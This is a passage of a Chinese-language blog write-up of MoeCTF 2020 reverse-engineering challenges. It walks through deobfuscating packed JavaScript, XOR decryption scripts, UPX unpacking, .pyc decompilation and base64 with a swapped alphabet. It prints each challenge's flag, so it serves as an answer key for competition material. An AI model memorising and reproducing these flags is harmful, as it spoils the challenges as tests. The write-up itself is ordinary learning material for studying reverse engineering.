混淆”:</p><p><img src="/images/2020moectf-Reverse/image-20210228232046.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20210228232046.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201015201547809"></p><p>什么???你没有搜索出来?</p><p>别问,问就是你的搜索引擎辣鸡!</p><p>混淆后:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">eval</span>(<span class="function"><span class="keyword">function</span>(<span class="params">p, a, c, k, e, d</span>) </span>{</span><br><span class="line"> e = <span class="function"><span class="keyword">function</span>(<span class="params">c</span>) </span>{</span><br><span class="line"> <span class="keyword">return</span> (c < a ? <span class="string">""</span>: e(<span class="built_in">parseInt</span>(c / a))) + ((c = c % a) > <span class="number">35</span> ? <span class="built_in">String</span>.fromCharCode(c + <span class="number">29</span>) : c.toString(<span class="number">36</span>))</span><br><span class="line"> };</span><br><span class="line"> <span class="keyword">if</span> (!<span class="string">''</span>.replace(<span class="regexp">/^/</span>, <span class="built_in">String</span>)) {</span><br><span class="line"> <span class="keyword">while</span> (c--) d[e(c)] = k[c] || e(c);</span><br><span class="line"> k = [<span class="function"><span class="keyword">function</span>(<span class="params">e</span>) </span>{</span><br><span class="line"> <span class="keyword">return</span> d[e]</span><br><span class="line"> }];</span><br><span class="line"> e = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'\\w+'</span></span><br><span class="line"> };</span><br><span class="line"> c = <span class="number">1</span>;</span><br><span class="line"> };</span><br><span class="line"> <span class="keyword">while</span> (c--) <span class="keyword">if</span> (k[c]) p = p.replace(<span class="keyword">new</span> <span class="built_in">RegExp</span>(<span class="string">'\\b'</span> + e(c) + <span class="string">'\\b'</span>, <span class="string">'g'</span>), k[c]);</span><br><span class="line"> <span class="keyword">return</span> p;</span><br><span class="line">} (<span class="string">'l 1=m(\'k-4-2\');i j 6(){1.2(\'q r p --n o b\');1.2(5 1.4());1.2(`a ${5 1.d(\'9 h e?\')}!`);f 3=g;F(!3){1.2(\'D E 7 B 8:\');3=5 1.4()===\'G{H\'+\'c\'+\'v\'+\'w\'+\'0\'+\'u-\'+\'s\'+\'t\'+\'z\'+\'A\'+\'!}\'}1.2(\'y! x C 7 8!\')}6();'</span>, <span class="number">44</span>, <span class="number">44</span>, <span class="string">'|io|write|saidHi|read|await|main|the|flag|Who|Hello|Reverier||ask|you|let|false|are|async|function|console|const|require|written|by|ThankYouJavaScript|MoeCTF|2020|Jav|aS||k_|Y|You|Congratulations|cr|ipt|true|find|Please|input|while|moectf|Fx'</span>.split(<span class="string">'|'</span>), <span class="number">0</span>, {}))</span><br></pre></td></tr></table></figure><p>解混淆后:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> io=<span class="built_in">require</span>(<span class="string">'console-read-write'</span>);</span><br><span class="line"><span class="keyword">async</span> <span class="function"><span class="keyword">function</span> <span class="title">main</span>(<span class="params"></span>)</span>{</span><br><span class="line"> io.write(<span class="string">'MoeCTF 2020 ThankYouJavaScript --written by Reverier'</span>);</span><br><span class="line"> io.write(<span class="keyword">await</span> io.read());</span><br><span class="line"> io.write(<span class="string">`Hello <span class="subst">${<span class="keyword">await</span> io.ask(<span class="string">'Who are you?'</span>)}</span>!`</span>);</span><br><span class="line"> <span class="keyword">let</span> saidHi=<span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">while</span>(!saidHi)</span><br><span class="line"> {</span><br><span class="line"> io.write(<span class="string">'Please input the true flag:'</span>);</span><br><span class="line"> saidHi=<span class="keyword">await</span> </span><br><span class="line"> io.read()===<span class="string">'moectf{Fx'</span>+<span class="string">'c'</span>+<span class="string">'k_'</span>+<span class="string">'Y'</span>+<span class="string">'0'</span>+<span class="string">'u-'</span>+<span class="string">'Jav'</span>+<span class="string">'aS'</span>+<span class="string">'cr'</span>+<span class="string">'ipt'</span>+<span class="string">'!}'</span></span><br><span class="line"> }</span><br><span class="line"> io.write(<span class="string">'Congratulations! You find the flag!'</span>)</span><br><span class="line">}main();</span><br></pre></td></tr></table></figure><blockquote><p>moectf{Fxck_Y0u-JavaScript!}</p></blockquote><h3 id="Simple-Re"><a href="#Simple-Re" class="headerlink" title="Simple Re"></a>Simple Re</h3><p>先运行一下:<img src="/images/2020moectf-Reverse/image-20201015202120586.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015202120586.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201015202120586"></p><p>嗯???竟然不直接给我<code>flag</code>,把他交给我的女朋友<code>IDA</code>,让我女朋友来收拾他!!!</p><p><img src="/images/2020moectf-Reverse/image-20201015202226688.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015202226688.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201015202226688"></p><p><img src="/images/2020moectf-Reverse/image-20201015202255951.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015202255951.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201015202255951"></p><p>发现关键比较!还是我女朋友厉害!!!</p><p>思路比较清晰,就是把我们输进去的东西进行一堆异或操作,然后和加密过的<code>flag</code>比较,也正应了提示:异或异或!</p><p>那我们把加密过的<code>flag</code>抠出来,然后写一个程序的逆向算法就ok了,但是异或怎么逆呢???</p><blockquote><p>性质</p><p>1、交换律</p><p>2、结合律,即(a ^ b) ^ c == a ^ ( b ^ c)</p><p>3、对于任何数x,都有x ^ x=0,x ^ 0=x</p><p><strong>4、自反性 A XOR B XOR B = A xor 0 = A</strong></p></blockquote><p>这里利用了异或操作的交换率和自反性</p><p>直接贴解密脚本:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span>)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="built_in">string</span> aim=<span class="string">"rpz|kydKw^qTl@Y/m2f/J-@o^k.,qkb"</span>;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i <= <span class="number">30</span>; ++i )</span><br><span class="line"> aim[i] ^= <span class="number">0x17</span>;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> j = <span class="number">0</span>; j <= <span class="number">30</span>; ++j )</span><br><span class="line"> aim[j] ^= <span class="number">0x39</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> k = <span class="number">0</span>; k <= <span class="number">30</span>; ++k )</span><br><span class="line"> aim[k] ^= <span class="number">0x4B</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> l = <span class="number">0</span>; l <= <span class="number">30</span>; ++l )</span><br><span class="line"> aim[l] ^= <span class="number">0x4A</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> m = <span class="number">0</span>; m <= <span class="number">30</span>; ++m )</span><br><span class="line"> aim[m] ^= <span class="number">0x49</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> n = <span class="number">0</span>; n <= <span class="number">30</span>; ++n )</span><br><span class="line"> aim[n] ^= <span class="number">0x26</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> ii = <span class="number">0</span>; ii <= <span class="number">30</span>; ++ii )</span><br><span class="line"> aim[ii] ^= <span class="number">0x15</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> jj = <span class="number">0</span>; jj <= <span class="number">30</span>; ++jj )</span><br><span class="line"> aim[jj] ^= <span class="number">0x61</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> kk = <span class="number">0</span>; kk <= <span class="number">30</span>; ++kk )</span><br><span class="line"> aim[kk] ^= <span class="number">0x56</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> ll = <span class="number">0</span>; ll <= <span class="number">30</span>; ++ll )</span><br><span class="line"> aim[ll] ^= <span class="number">0x1B</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> mm = <span class="number">0</span>; mm <= <span class="number">30</span>; ++mm )</span><br><span class="line"> aim[mm] ^= <span class="number">0x21</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> nn = <span class="number">0</span>; nn <= <span class="number">30</span>; ++nn )</span><br><span class="line"> aim[nn] ^= <span class="number">0x40</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i1 = <span class="number">0</span>; i1 <= <span class="number">30</span>; ++i1 )</span><br><span class="line"> aim[i1] ^= <span class="number">0x57</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i2 = <span class="number">0</span>; i2 <= <span class="number">30</span>; ++i2 )</span><br><span class="line"> aim[i2] ^= <span class="number">0x2E</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i3 = <span class="number">0</span>; i3 <= <span class="number">30</span>; ++i3 )</span><br><span class="line"> aim[i3] ^= <span class="number">0x49</span>u;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i4 = <span class="number">0</span>; i4 <= <span class="number">30</span>; ++i4 )</span><br><span class="line"> aim[i4] ^= <span class="number">0x37</span>u;</span><br><span class="line"> <span class="built_in">cout</span><<aim;</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">} </span><br></pre></td></tr></table></figure><p>基本上是从女朋友<code>IDA</code>那里直接拿的,就加了一点点……</p><h3 id="Protection"><a href="#Protection" class="headerlink" title="Protection"></a>Protection</h3><p><img src="/images/2020moectf-Reverse/image-20201015204311672.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015204311672.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201015204311672"></p><p>这个提示已经很明显了,“给程序套一层衣服”=>”壳”:</p><p><img src="/images/2020moectf-Reverse/image-20201015204634519.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015204634519.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201015204634519"></p><p><code>DIE</code>查一下壳:<code>UPX3.96</code>,我们直接在github上面找<a href="https://github.com/upx/upx/releases/tag/v3.96">UPX3.96</a>壳的脱壳机进行“脱衣,扒光”:</p><p><img src="/images/2020moectf-Reverse/image-20201015205045144.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015205045144.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201015205045144"></p><p>我这个时候试运行一下:<img src="/images/2020moectf-Reverse/image-20201015205433735.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015205433735.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201015205433735"></p><p>哼~西内!竟然不直接给我<code>flag</code>,那你去见见我女朋友吧:<img src="/images/2020moectf-Reverse/image-20201015205601697.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015205601697.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201015205601697"></p><p>哟西~还是女朋友靠谱!!!程序逻辑很简单,还是异或操作,直接贴解密程序:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="built_in">string</span> x=<span class="string">"aouv#@!V08asdozpnma&*#%!$^&*"</span>;</span><br><span class="line"><span class="keyword">char</span> v5[<span class="number">30</span>];</span><br><span class="line"><span class="keyword">int</span> y[<span class="number">30</span>]={<span class="number">12</span>,<span class="number">0</span>,<span class="number">16</span>,<span class="number">21</span>,<span class="number">87</span>,<span class="number">38</span>,<span class="number">90</span>,<span class="number">35</span>,<span class="number">64</span>,<span class="number">64</span>,<span class="number">62</span>,<span class="number">66</span>,<span class="number">55</span>,<span class="number">48</span>,<span class="number">9</span>,<span class="number">25</span>,<span class="number">3</span>,<span class="number">29</span>,<span class="number">80</span>,<span class="number">67</span>,<span class="number">7</span>,<span class="number">87</span>,<span class="number">21</span>,<span class="number">126</span>,<span class="number">81</span>,<span class="number">109</span>,<span class="number">67</span>,<span class="number">87</span>};</span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i <= <span class="number">27</span>; ++i )</span><br><span class="line">v5[i]= y[i] ^ x[i];</span><br><span class="line"><span class="built_in">cout</span><<v5;</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><blockquote><p>moectf{upx_1S_simp1e-t0_u3e}</p></blockquote><h3 id="Real-EasyPython"><a href="#Real-EasyPython" class="headerlink" title="Real EasyPython"></a>Real EasyPython</h3><p>下载下来是<code>.pyc</code>文件,这个文件可以简单地理解成<code>py</code>的编译文件,所以我们按照常规思路,我们需要把这个反编译。搜索关键字“<code>Python</code> 反编译”:</p><p><img src="/images/2020moectf-Reverse/image-20201015212125827.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015212125827.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201015212125827"></p><p>可以在第一个网站上在线反编译,也可以在第二个的里面找到工具<code>uncompyle6</code>,我们这里讲一下<code>python</code>反编译工具的使用:</p><blockquote><p>pip install uncompyle6</p><p>uncompyle6 puzzle.pyc > puzzle_dec.py</p></blockquote><p><img src="/images/2020moectf-Reverse/image-20201015212449547.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015212449547.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201015212449547">我们下来直接看反编译的<code>python</code>脚本:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">key = [</span><br><span class="line"> <span class="number">115</span>, <span class="number">76</span>, <span class="number">50</span>, <span class="number">116</span>, <span class="number">90</span>, <span class="number">50</span>, <span class="number">116</span>, <span class="number">90</span>, <span class="number">115</span>, <span class="number">110</span>, <span class="number">48</span>, <span class="number">47</span>, <span class="number">87</span>, <span class="number">48</span>, <span class="number">103</span>, <span class="number">50</span>, <span class="number">106</span>, <span class="number">126</span>, <span class="number">90</span>, <span class="number">48</span>, <span class="number">103</span>, <span class="number">116</span>, <span class="number">126</span>, <span class="number">90</span>, <span class="number">85</span>, <span class="number">126</span>, <span class="number">115</span>, <span class="number">110</span>, <span class="number">105</span>, <span class="number">104</span>, <span class="number">35</span>]</span><br><span class="line">print(<span class="string">'Input your flag: '</span>, end=<span class="string">''</span>)</span><br><span class="line">flag = <span class="built_in">input</span>()</span><br><span class="line">out = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> flag:</span><br><span class="line"> out.append(<span class="built_in">ord</span>(i) >> <span class="number">4</span> ^ <span class="built_in">ord</span>(i))</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> <span class="built_in">len</span>(out) != <span class="built_in">len</span>(key):</span><br><span class="line"> print(<span class="string">'TRY AGAIN!'</span>)</span><br><span class="line"> exit()</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(out)):</span><br><span class="line"> <span class="keyword">if</span> out[i] != key[i]:</span><br><span class="line"> print(<span class="string">'TRY AGAIN!'</span>)</span><br><span class="line"> exit()</span><br><span class="line"></span><br><span class="line">print(<span class="string">'you are right! the flag is : moectf{%s}'</span> % flag)</span><br></pre></td></tr></table></figure><p>程序思路很清晰,但是这里有个小点:脚本里面的<code>>></code>操作怎么处理呢???直接<code><<</code>不就完了。错!因为<code>>></code>操作是将该数据转化为二进制然后抹去最后四位;而<code><<</code>操作是将该数据转化为二进制,然后直接在最后面补上四个’0’。所以这里的<code>>></code>暴力处理一下,上脚本:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">int</span> ori[<span class="number">50</span>]={<span class="number">115</span>, <span class="number">76</span>, <span class="number">50</span>, <span class="number">116</span>, <span class="number">90</span>, <span class="number">50</span>, <span class="number">116</span>, <span class="number">90</span>, <span class="number">115</span>, <span class="number">110</span>, <span class="number">48</span>, <span class="number">47</span>, <span class="number">87</span>, <span class="number">48</span>, <span class="number">103</span>, <span class="number">50</span>, <span class="number">106</span>, <span class="number">126</span>, <span class="number">90</span>, <span class="number">48</span>, <span class="number">103</span>, <span class="number">116</span>, <span class="number">126</span>, <span class="number">90</span>, <span class="number">85</span>, <span class="number">126</span>, <span class="number">115</span>, <span class="number">110</span>, <span class="number">105</span>, <span class="number">104</span>, <span class="number">35</span>};</span><br><span class="line"><span class="keyword">char</span> rel[<span class="number">50</span>];</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">33</span>;i++)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> j=<span class="number">33</span>;j<<span class="number">127</span>;j++)</span><br><span class="line"><span class="keyword">if</span>((j>><span class="number">4</span>^j)==ori[i])</span><br><span class="line">rel[i]=j;</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<rel;</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br><span class="line"><span class="meta"># moectf{tH1s_1s_th3-R3a1ly_3asy_Python!}</span></span><br></pre></td></tr></table></figure><h3 id="RxEncode"><a href="#RxEncode" class="headerlink" title="RxEncode"></a>RxEncode</h3><p>这个题……直接找我女朋友,我相信我搞不定,必须要找女朋友来帮忙。在<code>IDA</code>先查一下字符串:</p><p><img src="/images/2020moectf-Reverse/image-20201015235929048.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015235929048.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201015235929048"></p><p>看到那么一串字符串,盲猜换表<code>base64</code>然后看一看主函数的思路:</p><p><img src="/images/2020moectf-Reverse/image-20201016001109276.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201016001109276.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201016001109276"></p><p>程序的思路:</p><blockquote><p>输入<code>flag</code>=>“换表<code>base64</code>”加密=>与程序内部数据对比=><code>yes/no</code></p></blockquote><p>那我们的思路就是:</p><blockquote><p>扣出内部数据=>“换表<code>base64</code>”解密=><code>flag</code></p></blockquote><p>但是我们发现一个问题,就是程序内部的数据竟然不是字符,而是十六进制的形式:</p><p><img src="/images/2020moectf-Reverse/image-20201016002018346.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201016002018346.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201016002018346"></p><p>怎么办呢???这里涉及到了另外一个知识点“大小端序”,我们看到的<code>v2、v15、v16、v17</code>都是小端序存储显示出来的,我们进入<code>hex</code>窗口或者自己手动<code>dump</code>出来正常的内容:</p><blockquote><p><code>\x9A\x87\x9C\xB5\xFE\x58\xD1\x4A\xFE\x0B\xED\x6C\xFA\xFD\xEB\xCB\xE8\x34\xA3\x43\x8E\xA3\x47\x7A</code></p></blockquote><p>下来就是一个换表<code>base64</code>的问题了:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line">flag_en = <span class="string">b'\x9A\x87\x9C\xB5\xFE\x58\xD1\x4A\xFE\x0B\xED\x6C\xFA\xFD\xEB\xCB\xE8\x34\xA3\x43\x8E\xA3\x47\x7A'</span></span><br><span class="line">flag = <span class="built_in">str</span>(base64.b64encode(flag_en)).replace(<span class="string">'5'</span>, <span class="string">'{'</span>).replace(<span class="string">'6'</span>, <span class="string">'}'</span>)</span><br><span class="line">print(flag)</span><br><span class="line"><span class="comment"># moectf{Y0Ur+C+1s+v3ry+g0o0OOo0d}</span></span><br></pre></td></tr></table></figure><h3 id="EasyCommonLisp"><a href="#EasyCommonLisp" class="headerlink" title="EasyCommonLisp"></a>EasyCommonLisp</h3><p>这个题真是令人头大!!!为了做这个题,还得去学习一下<code>clisp</code>这门语言</p><blockquote><p>“一名真正的<code>CTF</code>选手,应该在<code>15mins</code>之内学会任何一门语言!!!(傲娇脸)” ——<code>XDSEC_Reverier(RX</code></p></blockquote><p>题目:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">(defparameter +alphabet+"AB#DEd@f&hi!klmnLMw3^5678N}PF|HIxyz012JKYZab%Q{S(UVWX-pqrs")(defparameter +len+(length +alphabet+))(defun divmod(number divisor)(values(floor(/ number divisor))(mod number divisor)))(defun encode(str)(let((value 0)(rstr(reverse str))(output(make-string-output-stream))(npad 0))(loop for i from 0 to(1- (length str))do(setf value(+ value(*(char-code(elt rstr i))(expt 256 i)))))(loop while(>= value +len+)do(multiple-value-bind(new-value mod)(divmod value +len+)(setf value new-value)(write-char(elt +alphabet+ mod) output)))(write-char(elt +alphabet+ value)output)(loop for char across str do(if(char-equal char #\Nul)(incf npad)(return)))(concatenate 'string(coerce(loop for i from 1 to npad collecting #\1)'string)(reverse(get-output-stream-string output)))))(print(encode 